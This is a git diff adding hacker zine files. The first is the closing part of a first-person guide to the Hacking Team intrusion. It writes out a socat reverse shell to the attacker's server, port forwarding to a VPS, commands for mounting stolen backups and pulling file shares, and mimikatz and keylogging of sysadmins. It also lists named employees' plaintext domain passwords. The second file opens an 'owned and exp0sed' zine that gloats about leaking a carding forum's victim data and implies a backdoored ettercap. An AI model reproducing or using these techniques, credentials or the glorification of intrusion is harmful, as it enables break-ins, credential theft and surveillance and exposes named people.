http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html +[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/ +[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf + + +----[ 5.2 - Buying Access ]----------------------------------------------------- + +Thanks to hardworking Russians and their exploit kits, traffic sellers, and +bot herders, many companies already have compromised computers in their +networks. Almost all of the Fortune 500, with their huge networks, have some +bots already inside. However, Hacking Team is a very small company, and most +of it's employees are infosec experts, so there was a low chance that they'd +already been compromised. + + +----[ 5.3 - Technical Exploitation ]-------------------------------------------- + +After the Gamma Group hack, I described a process for searching for +vulnerabilities [1]. Hacking Team had one public IP range: +inetnum: 93.62.139.32 - 93.62.139.47 +descr: HT public subnet + +Hacking Team had very little exposed to the internet. For example, unlike +Gamma Group, their customer support site needed a client certificate to +connect. What they had was their main website (a Joomla blog in which Joomscan +[2] didn't find anything serious), a mail server, a couple routers, two VPN +appliances, and a spam filtering appliance. So, I had three options: look for +a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the +embedded devices. A 0day in an embedded device seemed like the easiest option, +and after two weeks of work reverse engineering, I got a remote root exploit. +Since the vulnerabilities still haven't been patched, I won't give more +details, but for more information on finding these kinds of vulnerabilities, +see [3] and [4]. + +[1] http://pastebin.com/raw.php?i=cRYvK4jb +[2] http://sourceforge.net/projects/joomscan/ +[3] http://www.devttys0.com/ +[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A + + +--[ 6 - Be Prepared ]----------------------------------------------------------- + +I did a lot of work and testing before using the exploit against Hacking Team. +I wrote a backdoored firmware, and compiled various post-exploitation tools +for the embedded device. The backdoor serves to protect the exploit. Using the +exploit just once and then returning through the backdoor makes it harder to +identify and patch the vulnerabilities. + +The post-exploitation tools that I'd prepared were: + +1) busybox + + For all the standard Unix utilities that the system didn't have. + +2) nmap + + To scan and fingerprint Hacking Team's internal network. + +3) Responder.py + + The most useful tool for attacking windows networks when you have access to + the internal network, but no domain user. + +4) Python + + To execute Responder.py + +5) tcpdump + + For sniffing traffic. + +6) dsniff + + For sniffing passwords from plaintext protocols like ftp, and for + arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR + and NaGA, but it was hard to compile it for the system. + +7) socat + + For a comfortable shell with a pty: + my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port + hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \ + tcp:my_server:my_port + + And useful for a lot more, it's a networking swiss army knife. See the + examples section of its documentation. + +8) screen + + Like the shell with pty, it wasn't really necessary, but I wanted to feel + at home in Hacking Team's network. + +9) a SOCKS proxy server + + To use with proxychains to be able to access their local network from any + program. + +10) tgcd + + For forwarding ports, like for the SOCKS server, through the firewall. + +[1] https://www.busybox.net/ +[2] https://nmap.org/ +[3] https://github.com/SpiderLabs/Responder +[4] https://github.com/bendmorris/static-python +[5] http://www.tcpdump.org/ +[6] http://www.monkey.org/~dugsong/dsniff/ +[7] http://www.dest-unreach.org/socat/ +[8] https://www.gnu.org/software/screen/ +[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html +[10] http://tgcd.sourceforge.net/ + + +The worst thing that could happen would be for my backdoor or post-exploitation +tools to make the system unstable and cause an employee to investigate. So I +spent a week testing my exploit, backdoor, and post-exploitation tools in the +networks of other vulnerable companies before entering Hacking Team's network. + + +--[ 7 - Watch and Listen ]------------------------------------------------------ + +Now inside their internal network, I wanted to take a look around and think +about my next step. I started Responder.py in analysis mode (-A to listen +without sending poisoned responses), and did a slow scan with nmap. + + +--[ 8 - NoSQL Databases ]------------------------------------------------------- + +NoSQL, or rather NoAuthentication, has been a huge gift to the hacker +community [1]. Just when I was worried that they'd finally patched all of the +authentication bypass bugs in MySQL [2][3][4][5], new databases came into +style that lack authentication by design. Nmap found a few in Hacking Team's +internal network: + +27017/tcp open mongodb MongoDB 2.6.5 +| mongodb-databases: +| ok = 1 +| totalSizeMb = 47547 +| totalSize = 49856643072 +... +|_ version = 2.6.5 + +27017/tcp open mongodb MongoDB 2.6.5 +| mongodb-databases: +| ok = 1 +| totalSizeMb = 31987 +| totalSize = 33540800512 +| databases +... +|_ version = 2.6.5 + +They were the databases for test instances of RCS. The audio that RCS records +is stored in MongoDB with GridFS. The audio folder in the torrent [6] came +from this. They were spying on themselves without meaning to. + +[1] https://www.shodan.io/search?query=product%3Amongodb +[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql +[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html +[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c +[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html +[6] https://ht.transparencytoolkit.org/audio/ + + +--[ 9 - Crossed Cables ]-------------------------------------------------------- + +Although it was fun to listen to recordings and see webcam images of Hacking +Team developing their malware, it wasn't very useful. Their insecure backups +were the vulnerability that opened their doors. According to their +documentation [1], their iSCSI devices were supposed to be on a separate +network, but nmap found a few in their subnetwork 192.168.1.200/24: + +Nmap scan report for ht-synology.hackingteam.local (192.168.200.66) +... +3260/tcp open iscsi? +| iscsi-info: +| Target: iqn.2000-01.com.synology:ht-synology.name +| Address: 192.168.200.66:3260,0 +|_ Authentication: No authentication required + +Nmap scan report for synology-backup.hackingteam.local (192.168.200.72) +... +3260/tcp open iscsi? +| iscsi-info: +| Target: iqn.2000-01.com.synology:synology-backup.name +| Address: 10.0.1.72:3260,0 +| Address: 192.168.200.72:3260,0 +|_ Authentication: No authentication required + +iSCSI needs a kernel module, and it would've been difficult to compile it for +the embedded system. I forwarded the port so that I could mount it from a VPS: + +VPS: tgcd -L -p 3260 -q 42838 +Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838 + +VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1 + +Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it +because it thinks its IP is 192.168.200.72 instead of 127.0.0.1 + +The way I solved it was: +iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1 + +And now, after: +iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login + +...the device file appears! We mount it: +vmfs-fuse -o ro /dev/sdb1 /mnt/tmp + +and find backups of various virtual machines. The Exchange server seemed like +the most interesting. It was too big too download, but it was possible to +mount it remotely to look for interesting files: +$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk +$ fdisk -l /dev/loop0 +/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT + +so the offset is 2048 * 512 = 1048576 +$ losetup -o 1048576 /dev/loop1 /dev/loop0 +$ mount -o ro /dev/loop1 /mnt/exchange/ + +now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311 +we find the hard disk of the VM, and mount it: +vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/ +mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1 + +...and finally we've unpacked the Russian doll and can see all the files from +the old Exchange server in /mnt/part1 + +[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf + + +--[ 10 - From backups to domain admin ]----------------------------------------- + +What interested me most in the backup was seeing if it had a password or hash +that could be used to access the live server. I used pwdump, cachedump, and +lsadump [1] on the registry hives. lsadump found the password to the besadmin +service account: + +_SC_BlackBerry MDS Connection Service +0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8. +0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!........... + +I used proxychains [2] with the socks server on the embedded device and +smbclient [3] to check the password: +proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!' + +It worked! The password for besadmin was still valid, and a local admin. I +used my proxy and metasploit's psexec_psh [4] to get a meterpreter session. +Then I migrated to a 64 bit process, ran "load kiwi" [5], "creds_wdigest", and +got a bunch of passwords, including the Domain Admin: + +HACKINGTEAM BESAdmin bes32678!!! +HACKINGTEAM Administrator uu8dd8ndd12! +HACKINGTEAM c.pozzi P4ssword <---- lol great sysadmin +HACKINGTEAM m.romeo ioLK/(90 +HACKINGTEAM l.guerra 4luc@=.= +HACKINGTEAM d.martinez W4tudul3sp +HACKINGTEAM g.russo GCBr0s0705! +HACKINGTEAM a.scarafile Cd4432996111 +HACKINGTEAM r.viscardi Ht2015! +HACKINGTEAM a.mino A!e$$andra +HACKINGTEAM m.bettini Ettore&Bella0314 +HACKINGTEAM m.luppi Blackou7 +HACKINGTEAM s.gallucci 1S9i8m4o! +HACKINGTEAM d.milan set!dob66 +HACKINGTEAM w.furlan Blu3.B3rry! +HACKINGTEAM d.romualdi Rd13136f@# +HACKINGTEAM l.invernizzi L0r3nz0123! +HACKINGTEAM e.ciceri 2O2571&2E +HACKINGTEAM e.rabe erab@4HT! + +[1] https://github.com/Neohapsis/creddump7 +[2] http://proxychains.sourceforge.net/ +[3] https://www.samba.org/ +[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf +[5] https://github.com/gentilkiwi/mimikatz + + +--[ 11 - Downloading the mail ]------------------------------------------------- + +With the Domain Admin password, I have access to the email, the heart of the +company. Since with each step I take there's a chance of being detected, I +start downloading their email before continuing to explore. Powershell makes +it easy [1]. Curiously, I found a bug with Powershell's date handling. After +downloading the emails, it took me another couple weeks to get access to the +source code and everything else, so I returned every now and then to download +the new emails. The server was Italian, with dates in the format +day/month/year. I used: +-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')} + +with New-MailboxExportRequest to download the new emails (in this case all +mail since June 5). The problem is it says the date is invalid if you +try a day larger than 12 (I imagine because in the US the month comes first +and you can't have a month above 12). It seems like Microsoft's engineers only +test their software with their own locale. + +[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/ + + +--[ 12 - Downloading Files ]---------------------------------------------------- + +Now that I'd gotten Domain Admin, I started to download file shares using my +proxy and the -Tc option of smbclient, for example: + +proxychains smbclient '//192.168.1.230/FAE DiskStation' \ + -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*' + +I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in +the torrent like that. + + +--[ 13 - Introduction to hacking windows domains ]------------------------------ + +Before continuing with the story of the "weones culiaos" (Hacking Team), I +should give some general knowledge for hacking windows networks. + + +----[ 13.1 - Lateral Movement ]------------------------------------------------- + +I'll give a brief review of the different techniques for spreading withing a +windows network. The techniques for remote execution require the password or +hash of a local admin on the target. By far, the most common way of obtaining +those credentials is using mimikatz [1], especially sekurlsa::logonpasswords +and sekurlsa::msv, on the computers where you already have admin access. The +techniques for "in place" movement also require administrative privileges +(except for runas). The most important tools for privilege escalation are +PowerUp [2], and bypassuac [3]. + +[1] https://adsecurity.org/?page_id=1821 +[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp +[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1 + + +Remote Movement: + +1) psexec + + The tried and true method for lateral movement on windows. You can use + psexec [1], winexe [2], metasploit's psexec_psh [3], Powershell Empire's + invoke_psexec [4], or the builtin windows command "sc" [5]. For the + metasploit module, powershell empire, and pth-winexe [6], you just need the + hash, not the password. It's the most universal method (it works on any + windows computer with port 445 open), but it's also the least stealthy. + Event type 7045 "Service Control Manager" will appear in the event logs. In + my experience, no one has ever noticed during a hack, but it helps the + investigators piece together what the hacker did afterwards. + +2) WMI + + The most stealthy method. The WMI service is enabled on all windows + computers, but except for servers, the firewall blocks it by default. You + can use wmiexec.py [7], pth-wmis [6] (here's a demonstration of wmiexec and + pth-wmis [8]), Powershell Empire's invoke_wmi [9], or the windows builtin + wmic [5]. All except wmic just need the hash. + +3) PSRemoting [10] + + It's disabled by default, and I don't recommend enabling new protocols. + But, if the sysadmin has already enabled it, it's very convenient, + especially if you use powershell for everything (and you should use + powershell for almost everything, it will change [11] with powershell 5 and + windows 10, but for now powershell makes it easy to do everything in RAM, + avoid AV, and leave a small footprint) + +4) Scheduled Tasks + + You can execute remote programs with at and schtasks [5]. It works in the + same situations where you could use psexec, and it also leaves a well known + footprint [12]. + +5) GPO + + If all those protocols are disabled or blocked by the firewall, once you're + Domain Admin, you can use GPO to give users a login script, install an msi, + execute a scheduled task [13], or, like we'll see with the computer of + Mauro Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and + open the firewall. + +[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx +[2] https://sourceforge.net/projects/winexe/ +[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh +[4] http://www.powershellempire.com/?page_id=523 +[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/ +[6] https://github.com/byt3bl33d3r/pth-toolkit +[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py +[8] https://www.trustedsec.com/june-2015/no_psexec_needed/ +[9] http://www.powershellempire.com/?page_id=124 +[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/ +[11] https://adsecurity.org/?p=2277 +[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems +[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py + + +"In place" Movement: + +1) Token Stealing + + Once you have admin access on a computer, you can use the tokens of the + other users to access resources in the domain. Two tools for doing this are + incognito [1] and the mimikatz token::* commands [2]. + +2) MS14-068 + + You can take advantage of a validation bug in Kerberos to generate Domain + Admin tickets [3][4][5]. + +3) Pass the Hash + + If you have a user's hash, but they're not logged in, you can use + sekurlsa::pth [2] to get a ticket for the user. + +4) Process Injection + + Any RAT can inject itself into other processes. For example, the migrate + command in meterpreter and pupy [6], or the psinject [7] command in + powershell empire. You can inject into the process that has the token you + want. + +5) runas + + This is sometimes very useful since it doesn't require admin privileges. + The command is part of windows, but if you don't have a GUI you can use + powershell [8]. + +[1] https://www.indetectables.net/viewtopic.php?p=211165 +[2] https://adsecurity.org/?page_id=1821 +[3] https://github.com/bidord/pykek +[4] https://adsecurity.org/?p=676 +[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html +[6] https://github.com/n1nj4sec/pupy +[7] http://www.powershellempire.com/?page_id=273 +[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1 + + +----[ 13.2 - Persistence ]------------------------------------------------------ + +Once you have access, you want to keep it. Really, persistence is only a +challenge for assholes like Hacking Team who target activists and other +individuals. To hack companies, persistence isn't needed since companies never +sleep. I always use Duqu 2 style "persistence", executing in RAM on a couple +high-uptime servers. On the off chance that they all reboot at the same time, +I have passwords and a golden ticket [1] as backup access. You can read more +about the different techniques for persistence in windows here [2][3][4]. But +for hacking companies, it's not needed and it increases the risk of detection. + +[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/ +[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/ +[3] http://www.hexacorn.com/blog/category/autostart-persistence/ +[4] https://blog.netspi.com/tag/persistence/ + + +----[ 13.3 - Internal reconnaissance ]------------------------------------------ + +The best tool these days for understanding windows networks is Powerview [1]. +It's worth reading everything written by it's author [2], especially [3], [4], +[5], and [6]. Powershell itself is also quite powerful [7]. As there are still +many windows 2000 and 2003 servers without powershell, you also have to learn +the old school [8], with programs like netview.exe [9] or the windows builtin +"net view". Other techniques that I like are: + +1) Downloading a list of file names + + With a Domain Admin account, you can download a list of all filenames in + the network with powerview: + + Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ | + select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] | + select fullname | out-file -append files.txt} + + Later, you can read it at your leisure and choose which files to download. + +2) Reading email + + As we've already seen, you can download email with powershell, and it has a + lot of useful information. + +3) Reading sharepoint + + It's another place where many businesses store a lot of important + information. It can also be downloaded with powershell [10]. + +4) Active Directory [11] + + It has a lot of useful information about users and computers. Without being + Domain Admin, you can already get a lot of info with powerview and other + tools [12]. After getting Domain Admin, you should export all the AD + information with csvde or another tool. + +5) Spy on the employees + + One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi + (one of Hacking Team's sysadmins) gave me access to a Nagios server which + gave me access to the rete sviluppo (development network with the source + code of RCS). With a simple combination of Get-Keystrokes and + Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang + [14], and GPO, you can spy on any employee, or even on the whole domain. + +[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView +[2] http://www.harmj0y.net/blog/tag/powerview/ +[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/ +[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/ +[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/ +[6] http://www.slideshare.net/harmj0y/i-have-the-powerview +[7] https://adsecurity.org/?p=2535 +[8] https://www.youtube.com/watch?v=rpwrKhgMd7E +[9] https://github.com/mubix/netview +[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/ +[11] https://adsecurity.org/?page_id=41 +[12] http://www.darkoperator.com/?tag=Active+Directory +[13] https://github.com/PowerShellMafia/PowerSploit +[14] https://github.com/samratashok/nishang + + +--[ 14 - Hunting Sysadmins ]---------------------------------------------------- + +Reading their documentation about their infrastructure [1], I saw that I was +still missing access to something important - the "Rete Sviluppo", an isolated +network with the source code for RCS. The sysadmins of a company always have +access to everything, so I searched the computers of Mauro Romeo and Christian +Pozzi to see how they administer the Sviluppo network, and to see if there +were any other interesting systems I should investigate. It was simple to +access their computers, since they were part of the windows domain where I'd +already gotten admin access. Mauro Romeo's computer didn't have any ports +open, so I opened the port for WMI [2] and executed meterpreter [3]. In +addition to keylogging and screen scraping with Get-Keystrokes and +Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1 +[4], and searched for interesting files [5]. Upon seeing that Pozzi had a +Truecrypt volume, I waited until he'd mounted it and then copied off the +files. Many have made fun of Christian Pozzi's weak passwords (and of +Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I +included them in the leak as a false clue, and to laugh at him. The reality is +that mimikatz and keyloggers view all passwords equally. + +[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/ +[2] http://www.hammer-software.com/wmigphowto.shtml +[3] https://www.trustedsec.com/june-2015/no_psexec_needed/ +[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde +[5] http://pwnwiki.io/#!presence/windows/find_files.md +[6] http://archive.is/TbaPy +[7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/ +[8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt +[9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/ + + +--[ 15 - The bridge ]----------------------------------------------------------- + +Within Christian Pozzi's Truecrypt volume, there was a textfile with many +passwords [1]. One of those was for a Fully Automated Nagios server, which had +access to the Sviluppo network in order to monitor it. I'd found the bridge I +needed. The textfile just had the password to the web interface, but there was +a public code execution exploit [2] (it's an unauthenticated exploit, but it +requires that at least one user has a session initiated, for which I used the +password from the textfile). + +[1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt +[2] http://seclists.org/fulldisclosure/2014/Oct/78 + + +--[ 16 - Reusing and resetting passwords ]-------------------------------------- + +Reading the emails, I'd seen Daniele Milan granting access to git repos. I +already had his windows password thanks to mimikatz. I tried it on the git +server and it worked. Then I tried sudo and it worked. For the gitlab server +and their twitter account, I used the "forgot my password" function along with +my access to their mail server to reset the passwords. + + +--[ 17 - Conclusion ]----------------------------------------------------------- + +That's all it takes to take down a company and stop their human rights abuses. +That's the beauty and asymmetry of hacking: with 100 hours of work, one person +can undo years of work by a multi-million dollar company. Hacking gives the +underdog a chance to fight and win. + +Hacking guides often end with a disclaimer: this information is for +educational purposes only, be an ethical hacker, don't attack systems you +don't have permission to, etc. I'll say the same, but with a more rebellious +conception of "ethical" hacking. Leaking documents, expropriating money from +banks, and working to secure the computers of ordinary people is ethical +hacking. However, most people that call themselves "ethical hackers" just work +to secure those who pay their high consulting fees, who are often those most +deserving to be hacked. + +Hacking Team saw themselves as part of a long line of inspired Italian design +[1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri, +and government, as part of a long tradition of Italian fascism. I'd like to +dedicate this guide to the victims of the raid on the Armando Diaz school, and +to all those who have had their blood spilled by Italian fascists. + +[1] https://twitter.com/coracurrier/status/618104723263090688 + + +--[ 18 - Contact ]-------------------------------------------------------------- + +To send me spear phishing attempts, death threats in Italian [1][2], and to +give me 0days or access inside banks, corporations, governments, etc. + +[1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/ +[2] https://twitter.com/CthulhuSec/status/619459002854977537 + +only encrypted email please: +https://securityinabox.org/es/thunderbird_usarenigmail +-----BEGIN PGP PUBLIC KEY BLOCK----- + +mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx +vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g +27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x ++fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h +VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8 +Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh +Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL +BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac +QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf +cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0 +JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys +4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8 +X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E +VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai +oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm +n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F +Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9 +WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo +jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK +CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA +OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR +LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi +JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq +Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB +D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k +=E5+y +-----END PGP PUBLIC KEY BLOCK----- + + + + If not you, who? If not now, when? + _ _ _ ____ _ _ + | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | + | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | + | _ | (_| | (__| < | |_) | (_| | (__| <|_| + |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) \ No newline at end of file diff --git a/owned and exposed/2.txt b/owned and exposed/2.txt new file mode 100644 index 0000000..d888272 --- /dev/null +++ b/owned and exposed/2.txt @@ -0,0 +1,4975 @@ + |\___/| + -=[ISSUE - NO 2]=- =) ^Y^ (= + -=[OF]=- \ ^ / + )=*=( + ______________________________ __ ____________ _ / \ +|.-----.--.--.--.-----.-----.--| | ___ ___ _| || | | +|| _ | | | | | -__| _ | | . | | . || /| | | |\ +||_____|________|__|__|_____|_____| |__,|_|_|___|| \| | |_|/\ +| | | ______ |__//_// ___/ __ +| | | .-----.--.--.-----.| |.-----.--\_).--| || +| | | | -__|_ _| _ || || ||__ --| -__| _ || +| | | |_____|__.__| __|| || ||_____|_____|_____|| +|_/ \__________________________|__|___| || |___________________| + |______| +------------------------.++- + / y- + / y- +---------------------/ s/----------------------.++- + / ys+-. |\ / y- +---------------\.../ /\ ys------/()/ / y- + sy \/ /'''\ \| / s/- +------------------+-++s /-----' / s+-. +---------------------/s /-------------\.../ /\ ys + -y s sy \/ /'''\ +-----------------------y s---------------------++s /-----' +----------------------++' |\ /s / +-------------------------------------/()/ -y ys + \| -y s +-------------------------------------------------++' + |_______________ +,_._._._._._._._,_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _| carders.cc `\ +|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| inj3ct0r \ + ~ Featuring ~ | ettercap \ + _______________| |___________________\ + /´ exploit-db | ! + / backtrack |_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _,_._._._._._._._, + / free-hack |_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| + /___________________| ~ and ~ + ! + + Out of the Blue + into the Black +,_._._._._._._._|____________________________________________________ +|_|_|_|_|_|_|_|_|___________________________________________________/ + ~ INTRO ~ ! + +Greetings followers, welcome to the second issue of owned and exp0sed. +This file is encoded with UTF-8, so to view it properly use unicode. + +For those who are reading and laughing with us: +We (your happy ninjas) wish you a + + , + _/^\_ + < hax > + /.-.\ + * MERRY * `/&\` + ,@.*;@, + /_o.I %_\ + (`'--:o(_@; + /`;--.,__ `') + ;@`o % O,*`'`&\ + (`'--)_@ ;o %'()\ + * NINJA * /`;--._`''--._O'@; + /&*,()~o`;-.,_ `""`) + /`,@ ;+& () o*`;-';\ + (`""--.,_0 +% @' &()\ + /-.,_ ``''--....-'`) + /@%;o`:;'--,.__ __.'\ + ;*,&(); @ % &^;~`"`o;@(); + * HAXMAS * /(); o^~; & ().o@*&`;&%O\ + `"="==""==,,,.,="=="==="` + __.----.(\-''#####---...___...-----._ + '` \)_`"""""` + .--' `) + o( )_-\ + `"""` ` + +After our first release we got wind of some strange rumours. So just +to be sure, we need to clarify some facts. + +So, who are we? First, lets talk about some things we are not. We are +not an underground rival kiddy group. We are not a cyber mafia gang. +We are the watchmen, the hackers who quietly observe the scene. If any +skiddy community gets too big, we shut them down. If any lamer causes +too much trouble, we shut them down. If any group keeps fucking stuff +up, we stop them. + +So, why are we doing this? Some people say that being a vigilanty is +wrong and that we are actually criminals. What can we say? This may be +true. But the way we see it, if your not part of the solution, your +part of the fucking problem. These idiots spread garbage across our +scene and that is why they got owned. We take pride in what is left of +the scene and we have serious problems with those who rape it. + +That's why we do what MUST be done. + +There are some things left we would like to say about carders.cc. +First of all, they came back online after they got rm'ed. In the first +issue we gave our word that we would make sure carders.cc would never +come back. Well, we delivered on that promise in this issue. And as +such carders.cc has once again been eliminated. Maybe this time they +will get the hint. + +Also, Heise Security said that we were a rival group trying to +capitalize on the demise of carders.cc. Apparently they weren't happy +about our disclosure of the carders.cc database that included the +personal information of carders.cc victims. What Heise forgot was that +with this action, all the victims of carders.cc got the chance to +realize that they were victims of fraud. You can try to say that our +disclosure of the database put them at even greater risk of fraud but +we disagree. What is more risky? Having your information secretly on +an "underground" carding forum where it WILL be sold and used in +frauduelent activity? Or, having it released so that you can be +notified and take the appropriate action to mitigate the damage that +has been done? I know which option I'd rather have. + +It is quite impressive how many people wrote about the Carders Hack +without even bothering to read the zine. It is hilarious to see how +the media works. Somebody writes an article, others copy information +from it, others copy from it again. If we take a shit in a bowl. Then +you eat that shit and puke it back into a different bowl for someone +else to eat then they do the same thing, what do you have? "Two +Journo's One Cup" is what you have. Fucking pathetic. + +On the other hand, we'd like to thank Brian Krebs. Even if some of his +conclusions were way off the mark, he was still the first one to +report about carders.cc and nearly every other article was based on +Brian's work. At least you didn't eat shit and regurgitate it like the +rest Brian, keep up the good work. + +Enough jibber jabber, let's get to business. You will soon realize +that our targets vary: + +We owned ettercap because we were tired of people firing that shit up +and pretending to be a l33th4x0r sheep who think they are the greatest +hackerz with their ARP spoofing toolkitz.. If you have installed +ettercap in the last 5 years you may want to check yo shit 